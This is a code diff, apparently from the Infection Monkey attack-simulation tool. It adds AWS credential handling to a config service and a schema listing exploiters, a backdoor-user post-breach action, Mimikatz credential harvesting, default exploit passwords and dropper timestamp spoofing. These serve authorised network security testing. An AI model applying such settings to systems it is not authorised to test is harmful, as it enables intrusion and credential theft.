|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"options": {
|
|
||||||
"collapsed": True
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
# This should be used for config values of array type (array of strings only)
|
# This should be used for config values of array type (array of strings only)
|
||||||
ENCRYPTED_CONFIG_ARRAYS = \
|
ENCRYPTED_CONFIG_ARRAYS = \
|
||||||
|
@ -881,7 +29,9 @@ ENCRYPTED_CONFIG_ARRAYS = \
|
||||||
# This should be used for config values of string type
|
# This should be used for config values of string type
|
||||||
ENCRYPTED_CONFIG_STRINGS = \
|
ENCRYPTED_CONFIG_STRINGS = \
|
||||||
[
|
[
|
||||||
|
['cnc', 'aws_config', 'aws_access_key_id'],
|
||||||
|
['cnc', 'aws_config', 'aws_account_id'],
|
||||||
|
['cnc', 'aws_config', 'aws_secret_access_key']
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@ -892,11 +42,12 @@ class ConfigService:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_config(is_initial_config=False, should_decrypt=True):
|
def get_config(is_initial_config=False, should_decrypt=True, is_island=False):
|
||||||
"""
|
"""
|
||||||
Gets the entire global config.
|
Gets the entire global config.
|
||||||
:param is_initial_config: If True, the initial config will be returned instead of the current config.
|
:param is_initial_config: If True, the initial config will be returned instead of the current config.
|
||||||
:param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
|
:param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
|
||||||
|
:param is_island: If True, will include island specific configuration parameters.
|
||||||
:return: The entire global config.
|
:return: The entire global config.
|
||||||
"""
|
"""
|
||||||
config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {}
|
config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {}
|
||||||
|
@ -904,6 +55,8 @@ class ConfigService:
|
||||||
config.pop(field, None)
|
config.pop(field, None)
|
||||||
if should_decrypt and len(config) > 0:
|
if should_decrypt and len(config) > 0:
|
||||||
ConfigService.decrypt_config(config)
|
ConfigService.decrypt_config(config)
|
||||||
|
if not is_island:
|
||||||
|
config.get('cnc', {}).pop('aws_config', None)
|
||||||
return config
|
return config
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -927,6 +80,12 @@ class ConfigService:
|
||||||
config = encryptor.dec(config)
|
config = encryptor.dec(config)
|
||||||
return config
|
return config
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def set_config_value(config_key_as_arr, value):
|
||||||
|
mongo_key = ".".join(config_key_as_arr)
|
||||||
|
mongo.db.config.update({'name': 'newconfig'},
|
||||||
|
{"$set": {mongo_key: value}})
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_flat_config(is_initial_config=False, should_decrypt=True):
|
def get_flat_config(is_initial_config=False, should_decrypt=True):
|
||||||
config_json = ConfigService.get_config(is_initial_config, should_decrypt)
|
config_json = ConfigService.get_config(is_initial_config, should_decrypt)
|
||||||
|
@ -986,6 +145,8 @@ class ConfigService:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def update_config(config_json, should_encrypt):
|
def update_config(config_json, should_encrypt):
|
||||||
|
# PBA file upload happens on pba_file_upload endpoint and corresponding config options are set there
|
||||||
|
cc.services.post_breach_files.set_config_PBA_files(config_json)
|
||||||
if should_encrypt:
|
if should_encrypt:
|
||||||
try:
|
try:
|
||||||
ConfigService.encrypt_config(config_json)
|
ConfigService.encrypt_config(config_json)
|
||||||
|
@ -1021,6 +182,7 @@ class ConfigService:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def reset_config():
|
def reset_config():
|
||||||
|
cc.services.post_breach_files.remove_PBA_files()
|
||||||
config = ConfigService.get_default_config(True)
|
config = ConfigService.get_default_config(True)
|
||||||
ConfigService.set_server_ips_in_config(config)
|
ConfigService.set_server_ips_in_config(config)
|
||||||
ConfigService.update_config(config, should_encrypt=False)
|
ConfigService.update_config(config, should_encrypt=False)
|
||||||
|
@ -1077,11 +239,15 @@ class ConfigService:
|
||||||
ConfigService._encrypt_or_decrypt_config(config, False)
|
ConfigService._encrypt_or_decrypt_config(config, False)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def decrypt_flat_config(flat_config):
|
def decrypt_flat_config(flat_config, is_island=False):
|
||||||
"""
|
"""
|
||||||
Same as decrypt_config but for a flat configuration
|
Same as decrypt_config but for a flat configuration
|
||||||
"""
|
"""
|
||||||
keys = [config_arr_as_array[2] for config_arr_as_array in (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
|
if is_island:
|
||||||
|
keys = [config_arr_as_array[2] for config_arr_as_array in
|
||||||
|
(ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
|
||||||
|
else:
|
||||||
|
keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
|
||||||
for key in keys:
|
for key in keys:
|
||||||
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
|
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
|
||||||
# Check if we are decrypting ssh key pair
|
# Check if we are decrypting ssh key pair
|
||||||
|
|
|
@ -0,0 +1,950 @@
|
||||||
|
WARNING_SIGN = u" \u26A0"
|
||||||
|
|
||||||
|
SCHEMA = {
|
||||||
|
"title": "Monkey",
|
||||||
|
"type": "object",
|
||||||
|
"definitions": {
|
||||||
|
"exploiter_classes": {
|
||||||
|
"title": "Exploit class",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SmbExploiter"
|
||||||
|
],
|
||||||
|
"title": "SMB Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"WmiExploiter"
|
||||||
|
],
|
||||||
|
"title": "WMI Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MSSQLExploiter"
|
||||||
|
],
|
||||||
|
"title": "MSSQL Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"RdpExploiter"
|
||||||
|
],
|
||||||
|
"title": "RDP Exploiter (UNSAFE)"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"Ms08_067_Exploiter"
|
||||||
|
],
|
||||||
|
"title": "MS08-067 Exploiter (UNSAFE)"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SSHExploiter"
|
||||||
|
],
|
||||||
|
"title": "SSH Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ShellShockExploiter"
|
||||||
|
],
|
||||||
|
"title": "ShellShock Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SambaCryExploiter"
|
||||||
|
],
|
||||||
|
"title": "SambaCry Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ElasticGroovyExploiter"
|
||||||
|
],
|
||||||
|
"title": "ElasticGroovy Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"Struts2Exploiter"
|
||||||
|
],
|
||||||
|
"title": "Struts2 Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"WebLogicExploiter"
|
||||||
|
],
|
||||||
|
"title": "Oracle Web Logic Exploiter"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"HadoopExploiter"
|
||||||
|
],
|
||||||
|
"title": "Hadoop/Yarn Exploiter"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"post_breach_acts": {
|
||||||
|
"title": "Post breach actions",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"BackdoorUser"
|
||||||
|
],
|
||||||
|
"title": "Back door user",
|
||||||
|
},
|
||||||
|
],
|
||||||
|
},
|
||||||
|
"finger_classes": {
|
||||||
|
"title": "Fingerprint class",
|
||||||
|
"type": "string",
|
||||||
|
"anyOf": [
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SMBFinger"
|
||||||
|
],
|
||||||
|
"title": "SMBFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"SSHFinger"
|
||||||
|
],
|
||||||
|
"title": "SSHFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"PingScanner"
|
||||||
|
],
|
||||||
|
"title": "PingScanner"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"HTTPFinger"
|
||||||
|
],
|
||||||
|
"title": "HTTPFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MySQLFinger"
|
||||||
|
],
|
||||||
|
"title": "MySQLFinger"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"MSSQLFinger"
|
||||||
|
],
|
||||||
|
"title": "MSSQLFinger"
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "string",
|
||||||
|
"enum": [
|
||||||
|
"ElasticFinger"
|
||||||
|
],
|
||||||
|
"title": "ElasticFinger"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"properties": {
|
||||||
|
"basic": {
|
||||||
|
"title": "Basic - Credentials",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"credentials": {
|
||||||
|
"title": "Credentials",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploit_user_list": {
|
||||||
|
"title": "Exploit user list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"Administrator",
|
||||||
|
"root",
|
||||||
|
"user"
|
||||||
|
],
|
||||||
|
"description": "List of usernames to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_password_list": {
|
||||||
|
"title": "Exploit password list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"Password1!",
|
||||||
|
"1234",
|
||||||
|
"password",
|
||||||
|
"12345678"
|
||||||
|
],
|
||||||
|
"description": "List of password to use on exploits using credentials"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"basic_network": {
|
||||||
|
"title": "Basic - Network",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"blocked_ips": {
|
||||||
|
"title": "Blocked IPs",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description": "List of IPs to not scan"
|
||||||
|
},
|
||||||
|
"local_network_scan": {
|
||||||
|
"title": "Local network scan",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the monkey should scan its subnets additionally"
|
||||||
|
},
|
||||||
|
"depth": {
|
||||||
|
"title": "Distance from island",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 2,
|
||||||
|
"description":
|
||||||
|
"Amount of hops allowed for the monkey to spread from the island. "
|
||||||
|
+ WARNING_SIGN
|
||||||
|
+ " Note that setting this value too high may result in the monkey propagating too far"
|
||||||
|
},
|
||||||
|
"subnet_scan_list": {
|
||||||
|
"title": "Scan IP/subnet list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"List of IPs/subnets the monkey should scan."
|
||||||
|
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"network_analysis": {
|
||||||
|
"title": "Network Analysis",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"inaccessible_subnets": {
|
||||||
|
"title": "Network segmentation testing",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"Test for network segmentation by providing a list of"
|
||||||
|
" subnets that should NOT be accessible to each other."
|
||||||
|
" For example, given the following configuration:"
|
||||||
|
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
|
||||||
|
" a Monkey running on 10.0.0.5 will try to access machines in the following"
|
||||||
|
" subnets: 11.0.0.2/32, 12.2.3.0/24."
|
||||||
|
" An alert on successful connections will be shown in the report"
|
||||||
|
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"monkey": {
|
||||||
|
"title": "Monkey",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"alive": {
|
||||||
|
"title": "Alive",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Is the monkey alive"
|
||||||
|
},
|
||||||
|
"post_breach_actions": {
|
||||||
|
"title": "Post breach actions",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/post_breach_acts"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
],
|
||||||
|
"description": "List of actions the Monkey will run post breach"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"behaviour": {
|
||||||
|
"title": "Behaviour",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"custom_PBA_linux_cmd": {
|
||||||
|
"title": "Linux post breach command",
|
||||||
|
"type": "string",
|
||||||
|
"default": "",
|
||||||
|
"description": "Linux command to be executed after breaching."
|
||||||
|
},
|
||||||
|
"PBA_linux_file": {
|
||||||
|
"title": "Linux post breach file",
|
||||||
|
"type": "string",
|
||||||
|
"format": "data-url",
|
||||||
|
"description": "File to be executed after breaching. "
|
||||||
|
"If you want custom execution behavior, "
|
||||||
|
"specify it in 'Linux post breach command' field. "
|
||||||
|
"Reference your file by filename."
|
||||||
|
},
|
||||||
|
"custom_PBA_windows_cmd": {
|
||||||
|
"title": "Windows post breach command",
|
||||||
|
"type": "string",
|
||||||
|
"default": "",
|
||||||
|
"description": "Windows command to be executed after breaching."
|
||||||
|
},
|
||||||
|
"PBA_windows_file": {
|
||||||
|
"title": "Windows post breach file",
|
||||||
|
"type": "string",
|
||||||
|
"format": "data-url",
|
||||||
|
"description": "File to be executed after breaching. "
|
||||||
|
"If you want custom execution behavior, "
|
||||||
|
"specify it in 'Windows post breach command' field. "
|
||||||
|
"Reference your file by filename."
|
||||||
|
},
|
||||||
|
"PBA_windows_filename": {
|
||||||
|
"title": "Windows PBA filename",
|
||||||
|
"type": "string",
|
||||||
|
"default": ""
|
||||||
|
},
|
||||||
|
"PBA_linux_filename": {
|
||||||
|
"title": "Linux PBA filename",
|
||||||
|
"type": "string",
|
||||||
|
"default": ""
|
||||||
|
},
|
||||||
|
"self_delete_in_cleanup": {
|
||||||
|
"title": "Self delete on cleanup",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Should the monkey delete its executable when going down"
|
||||||
|
},
|
||||||
|
"use_file_logging": {
|
||||||
|
"title": "Use file logging",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Should the monkey dump to a log file"
|
||||||
|
},
|
||||||
|
"serialize_config": {
|
||||||
|
"title": "Serialize config",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Should the monkey dump its config on startup"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"system_info": {
|
||||||
|
"title": "System info",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"extract_azure_creds": {
|
||||||
|
"title": "Harvest Azure Credentials",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||||
|
},
|
||||||
|
"collect_system_info": {
|
||||||
|
"title": "Collect system info",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to collect system info"
|
||||||
|
},
|
||||||
|
"should_use_mimikatz": {
|
||||||
|
"title": "Should use Mimikatz",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to use Mimikatz"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"life_cycle": {
|
||||||
|
"title": "Life cycle",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"max_iterations": {
|
||||||
|
"title": "Max iterations",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 1,
|
||||||
|
"description": "Determines how many iterations of the monkey's full lifecycle should occur"
|
||||||
|
},
|
||||||
|
"victims_max_find": {
|
||||||
|
"title": "Max victims to find",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 30,
|
||||||
|
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
||||||
|
},
|
||||||
|
"victims_max_exploit": {
|
||||||
|
"title": "Max victims to exploit",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 7,
|
||||||
|
"description":
|
||||||
|
"Determines the maximum number of machines the monkey"
|
||||||
|
" is allowed to successfully exploit. " + WARNING_SIGN
|
||||||
|
+ " Note that setting this value too high may result in the monkey propagating to "
|
||||||
|
"a high number of machines"
|
||||||
|
},
|
||||||
|
"timeout_between_iterations": {
|
||||||
|
"title": "Wait time between iterations",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 100,
|
||||||
|
"description":
|
||||||
|
"Determines for how long (in seconds) should the monkey wait between iterations"
|
||||||
|
},
|
||||||
|
"retry_failed_explotation": {
|
||||||
|
"title": "Retry failed exploitation",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the monkey should retry exploiting machines"
|
||||||
|
" it didn't successfuly exploit on previous iterations"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"internal": {
|
||||||
|
"title": "Internal",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"singleton_mutex_name": {
|
||||||
|
"title": "Singleton mutex name",
|
||||||
|
"type": "string",
|
||||||
|
"default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||||
|
"description":
|
||||||
|
"The name of the mutex used to determine whether the monkey is already running"
|
||||||
|
},
|
||||||
|
"keep_tunnel_open_time": {
|
||||||
|
"title": "Keep tunnel open time",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 60,
|
||||||
|
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
||||||
|
},
|
||||||
|
"monkey_dir_windows": {
|
||||||
|
"title": "Monkey's windows directory",
|
||||||
|
"type": "string",
|
||||||
|
"default": r"C:\Windows\temp\monkey_dir",
|
||||||
|
"description": "Directory containing all monkey files on windows"
|
||||||
|
},
|
||||||
|
"monkey_dir_linux": {
|
||||||
|
"title": "Monkey's linux directory",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/monkey_dir",
|
||||||
|
"description": "Directory containing all monkey files on linux"
|
||||||
|
},
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"classes": {
|
||||||
|
"title": "Classes",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"finger_classes": {
|
||||||
|
"title": "Fingerprint classes",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/finger_classes"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"SMBFinger",
|
||||||
|
"SSHFinger",
|
||||||
|
"PingScanner",
|
||||||
|
"HTTPFinger",
|
||||||
|
"MySQLFinger",
|
||||||
|
"MSSQLFinger",
|
||||||
|
"ElasticFinger"
|
||||||
|
],
|
||||||
|
"description": "Determines which classes to use for fingerprinting"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"kill_file": {
|
||||||
|
"title": "Kill file",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"kill_file_path_windows": {
|
||||||
|
"title": "Kill file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%windir%\\monkey.not",
|
||||||
|
"description": "Path of file which kills monkey if it exists (on Windows)"
|
||||||
|
},
|
||||||
|
"kill_file_path_linux": {
|
||||||
|
"title": "Kill file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/var/run/monkey.not",
|
||||||
|
"description": "Path of file which kills monkey if it exists (on Linux)"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"dropper": {
|
||||||
|
"title": "Dropper",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"dropper_set_date": {
|
||||||
|
"title": "Dropper sets date",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the dropper should set the monkey's file date to be the same as"
|
||||||
|
" another file"
|
||||||
|
},
|
||||||
|
"dropper_date_reference_path_windows": {
|
||||||
|
"title": "Dropper date reference path (Windows)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%windir%\\system32\\kernel32.dll",
|
||||||
|
"description":
|
||||||
|
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||||
|
" so on Windows (use fullpath)"
|
||||||
|
},
|
||||||
|
"dropper_date_reference_path_linux": {
|
||||||
|
"title": "Dropper date reference path (Linux)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/bin/sh",
|
||||||
|
"description":
|
||||||
|
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||||
|
" so on Linux (use fullpath)"
|
||||||
|
},
|
||||||
|
"dropper_target_path_linux": {
|
||||||
|
"title": "Dropper target path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/monkey",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
||||||
|
},
|
||||||
|
"dropper_target_path_win_32": {
|
||||||
|
"title": "Dropper target path on Windows (32bit)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "C:\\Windows\\monkey32.exe",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||||
|
"(32bit)"
|
||||||
|
},
|
||||||
|
"dropper_target_path_win_64": {
|
||||||
|
"title": "Dropper target path on Windows (64bit)",
|
||||||
|
"type": "string",
|
||||||
|
"default": "C:\\Windows\\monkey64.exe",
|
||||||
|
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||||
|
"(64 bit)"
|
||||||
|
},
|
||||||
|
"dropper_try_move_first": {
|
||||||
|
"title": "Try to move first",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description":
|
||||||
|
"Determines whether the dropper should try to move itsel instead of copying itself"
|
||||||
|
" to target path"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"logging": {
|
||||||
|
"title": "Logging",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"dropper_log_path_linux": {
|
||||||
|
"title": "Dropper log file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/user-1562",
|
||||||
|
"description": "The fullpath of the dropper log file on Linux"
|
||||||
|
},
|
||||||
|
"dropper_log_path_windows": {
|
||||||
|
"title": "Dropper log file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%temp%\\~df1562.tmp",
|
||||||
|
"description": "The fullpath of the dropper log file on Windows"
|
||||||
|
},
|
||||||
|
"monkey_log_path_linux": {
|
||||||
|
"title": "Monkey log file path on Linux",
|
||||||
|
"type": "string",
|
||||||
|
"default": "/tmp/user-1563",
|
||||||
|
"description": "The fullpath of the monkey log file on Linux"
|
||||||
|
},
|
||||||
|
"monkey_log_path_windows": {
|
||||||
|
"title": "Monkey log file path on Windows",
|
||||||
|
"type": "string",
|
||||||
|
"default": "%temp%\\~df1563.tmp",
|
||||||
|
"description": "The fullpath of the monkey log file on Windows"
|
||||||
|
},
|
||||||
|
"send_log_to_server": {
|
||||||
|
"title": "Send log to server",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the monkey sends its log to the Monkey Island server"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"exploits": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploit_lm_hash_list": {
|
||||||
|
"title": "Exploit LM hash list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [],
|
||||||
|
"description": "List of LM hashes to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_ntlm_hash_list": {
|
||||||
|
"title": "Exploit NTLM hash list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [],
|
||||||
|
"description": "List of NTLM hashes to use on exploits using credentials"
|
||||||
|
},
|
||||||
|
"exploit_ssh_keys": {
|
||||||
|
"title": "SSH key pairs list",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"default": [],
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"description": "List of SSH key pairs to use, when trying to ssh into servers"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"cnc": {
|
||||||
|
"title": "Monkey Island",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"servers": {
|
||||||
|
"title": "Servers",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"command_servers": {
|
||||||
|
"title": "Command servers",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"192.0.2.0:5000"
|
||||||
|
],
|
||||||
|
"description": "List of command servers to try and communicate with (format is <ip>:<port>)"
|
||||||
|
},
|
||||||
|
"internet_services": {
|
||||||
|
"title": "Internet services",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"monkey.guardicore.com",
|
||||||
|
"www.google.com"
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"List of internet services to try and communicate with to determine internet"
|
||||||
|
" connectivity (use either ip or domain)"
|
||||||
|
},
|
||||||
|
"current_server": {
|
||||||
|
"title": "Current server",
|
||||||
|
"type": "string",
|
||||||
|
"default": "192.0.2.0:5000",
|
||||||
|
"description": "The current command server the monkey is communicating with"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'aws_config': {
|
||||||
|
'title': 'AWS Configuration',
|
||||||
|
'type': 'object',
|
||||||
|
'description': 'These credentials will be used in order to export the monkey\'s findings to the AWS Security Hub.',
|
||||||
|
'properties': {
|
||||||
|
'aws_account_id': {
|
||||||
|
'title': 'AWS account ID',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS account ID that is subscribed to security hub feeds',
|
||||||
|
'default': ''
|
||||||
|
},
|
||||||
|
'aws_access_key_id': {
|
||||||
|
'title': 'AWS access key ID',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS public access key ID, can be found in the IAM user interface in the AWS console.',
|
||||||
|
'default': ''
|
||||||
|
},
|
||||||
|
'aws_secret_access_key': {
|
||||||
|
'title': 'AWS secret access key',
|
||||||
|
'type': 'string',
|
||||||
|
'description': 'Your AWS secret access key id, you can get this after creating a public access key in the console.',
|
||||||
|
'default': ''
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
